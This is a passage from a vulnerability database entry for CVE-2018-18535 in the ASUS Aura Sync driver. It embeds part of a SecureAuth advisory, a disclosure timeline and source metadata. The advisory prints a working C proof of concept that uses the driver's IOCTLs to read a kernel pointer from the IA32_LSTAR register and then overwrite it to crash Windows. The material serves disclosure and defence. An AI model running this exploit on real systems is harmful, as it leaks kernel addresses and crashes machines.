This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR\n// register value (leaks a kernel function pointer bypassing KASLR) and\n// then writing garbage to it (instant BSOD!)\n\n#include \u003cwindows.h\u003e\n\n// for \\\\.\\Asusgio\n#define IOCTL_ASIO_RDMSR 0xA0406458\n#define IOCTL_ASIO_WRMSR 0xA040A45C\n\nHANDLE ghDriver = 0;\n\n#pragma pack (push,1)\n\ntypedef struct _ASIO_MSRIO_STRUCT {\n DWORD reg;\n ULONG64 value;\n} ASIO_MSRIO_STRUCT;\n\n#pragma pack(pop)\n\n#define IOCTLMACRO(iocontrolcode, size) \\\n ULONG64 outbuffer[2] = { 0 }; \\\n DWORD returned = 0; \\\n DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)\u0026inbuffer,\n##size##, (LPVOID)outbuffer, sizeof(outbuffer), \u0026returned, NULL); \\\n return outbuffer[0]; \\\n\nULONG64 ASIO_RDMSR(DWORD reg)\n{\n ASIO_MSRIO_STRUCT inbuffer = { reg };\n IOCTLMACRO(IOCTL_ASIO_RDMSR, 4)\n}\n\nULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value)\n{\n ASIO_MSRIO_STRUCT inbuffer = { reg, value };\n IOCTLMACRO(IOCTL_ASIO_WRMSR, 12)\n}\n\nBOOL InitDriver()\n{\n ghDriver = CreateFile(\"\\\\\\\\.\\\\Asusgio\", GENERIC_READ |\nGENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,\nFILE_ATTRIBUTE_NORMAL, NULL);\n\n if (ghDriver == INVALID_HANDLE_VALUE) {\n printf(\"Cannot get handle to driver object \\\u0027%s\\\u0027-\nGetLastError:%d\\n\", \"\\\\\\\\.\\\\Asusgio\", GetLastError());\n return FALSE;\n }\n\n return TRUE;\n}\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n printf(\"ASUS Aura Sync PoC (MSR access)\\n\");\n \n if (!InitDriver()) {\n printf(\"InitDriver failed! - aborting...\\n\");\n exit(0);\n }\n\n ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);\n printf(\"IA32_LSTAR: %llx (should be nt!KiSystemCall64)\\n\", IA32_LSTAR);\n printf(\"press ENTER for instant BSOD\\n\");\n getchar();\n a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222);\n CloseHandle(ghDriver);\n}\n-----/\n\n*8. *Report Timeline**\n2017-11-27: SecureAuth sent an initial notification to ASUS, asking for\nGPG keys. \n2017-12-14: SecureAuth sent a second notification to ASUS. \n2018-01-29: SecureAuth sent a third notification to ASUS. \n2018-01-30: Asus acknowledged SecureAuth\u0027s e-mail and asked for a report\nwith technical information. \n2018-01-31: SecureAuth sent Asus a draft version of the advisory. \n2018-02-07: SecureAuth requested an update from Asus regarding the\nreported vulnerabilities and a tentative schedule. \n2018-02-14: SecureAuth again requested an update from Asus regarding the\nreported vulnerabilities and a tentative schedule. \n2018-02-21: Asus acknowledged SecureAuth\u0027s draft report and asked for\ntime for internal investigations. \n2018-02-21: Asus answered saying that they were planning to update Aura\nin April. \n2018-02-21: SecureAuth thanked Asus\u0027s feedback and requested a regular\ncontact until the Auras update. \n2018-03-19: SecureAuth asked for a status update. \n2018-03-26: SecureAuth asked for a status update again. \n2018-03-26: SecureAuth asked Asus to confirm if this new version had\nbeen already released. \n2018-04-03: SecureAuth requested a status update. \n2018-04-16: SecureAuth requested a confirmation for Asus. \n2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn\u0027t address the reported\nvulnerabilities. For that reason, SecureAuth requested a clarification\nabout the case. In this context, SecureAuth requested a new clarification. \n2018-07-03: SecureAuth requested a status update. \n2018-12-18: Advisory CORE-2017-0012 published as \u0027user release\u0027. \n\n*9. *References**\n\n[1] https://www.asus.com/support\n\n*10. *About SecureAuth Labs**\n\nSecureAuth Labs, the research arm of SecureAuth Corporation, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct research in several important areas of\ncomputer security, including identity-related attacks, system\nvulnerabilities and cyber-attack planning. Research includes problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. We regularly publish security\nadvisories, primary research, technical publications, research blogs,\nproject information, and shared software tools for public use at\nhttp://www.secureauth.com. \n\n*11. *About SecureAuth**\n\nSecureAuth is leveraged by leading companies, their employees, their\ncustomers and their partners to eliminate identity-related breaches. \nAs a leader in access management, identity governance, and penetration\ntesting, SecureAuth is powering an identity security revolution by\nenabling people and devices to intelligently and adaptively access\nsystems and data, while effectively keeping bad actors from doing harm. \nBy ensuring the continuous assessment of risk and enablement of trust,\nSecureAuth\u0027s highly flexible Identity Security Automation (ISA) platform\nmakes it easier for organizations to prevent the misuse of credentials\nand exponentially reduce the enterprise threat surface. To learn more,\nvisit www.secureauth.com, call (949) 777-6959, or email us at\ninfo@secureauth.com\n\n*12. *Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 SecureAuth, and are\nlicensed under a Creative Commons Attribution Non-Commercial Share-Alike\n3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-18535"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "BID",
"id": "106250"
},
{
"db": "VULHUB",
"id": "VHN-129104"
},
{
"db": "PACKETSTORM",
"id": "150893"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-18535",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "150893",
"trust": 2.6
},
{
"db": "BID",
"id": "106250",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-129104",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-129104"
},
{
"db": "BID",
"id": "106250"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "PACKETSTORM",
"id": "150893"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
},
{
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"id": "VAR-201812-0059",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-129104"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:00:11.283000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.asus.com/jp/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-284",
"trust": 0.9
},
{
"problemtype": "CWE-668",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-129104"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/150893/asus-driver-privilege-escalation.html"
},
{
"trust": 2.1,
"url": "https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/106250"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2018/dec/34"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18535"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18535"
},
{
"trust": 0.3,
"url": "https://www.asus.com/campaign/aura/us/download.html"
},
{
"trust": 0.3,
"url": "https://www.asus.com/in/"
},
{
"trust": 0.1,
"url": "https://www.asus.com/support"
},
{
"trust": 0.1,
"url": "https://www.secureauth.com,"
},
{
"trust": 0.1,
"url": "http://www.secureauth.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18537"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18536"
},
{
"trust": 0.1,
"url": "http://www.secureauth.com."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-129104"
},
{
"db": "BID",
"id": "106250"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "PACKETSTORM",
"id": "150893"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
},
{
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-129104"
},
{
"db": "BID",
"id": "106250"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "PACKETSTORM",
"id": "150893"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
},
{
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-26T00:00:00",
"db": "VULHUB",
"id": "VHN-129104"
},
{
"date": "2018-12-18T00:00:00",
"db": "BID",
"id": "106250"
},
{
"date": "2019-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"date": "2018-12-21T20:32:22",
"db": "PACKETSTORM",
"id": "150893"
},
{
"date": "2018-12-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-977"
},
{
"date": "2018-12-26T21:29:01.120000",
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-129104"
},
{
"date": "2018-12-18T00:00:00",
"db": "BID",
"id": "106250"
},
{
"date": "2019-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"date": "2020-10-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-977"
},
{
"date": "2024-11-21T03:56:06.637000",
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "106250"
},
{
"db": "PACKETSTORM",
"id": "150893"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
}
],
"trust": 1.0
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS Aura Sync Access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.